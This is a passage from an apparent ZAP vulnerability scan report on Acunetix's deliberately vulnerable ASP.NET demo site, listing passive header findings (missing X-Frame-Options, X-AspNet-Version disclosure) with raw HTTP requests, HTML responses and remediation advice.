          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/rVVS1oArBGNWHuMPoCTb1Ib2vQA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						<span id="lblStatus">Subscription successfull. Please visit the login page to login.</span>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

  4. Risk=, Confidence=高等的 (29)

    1. http://testaspnet.vulnweb.com (29)

      1. X-AspNet-Version Response Header (29)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
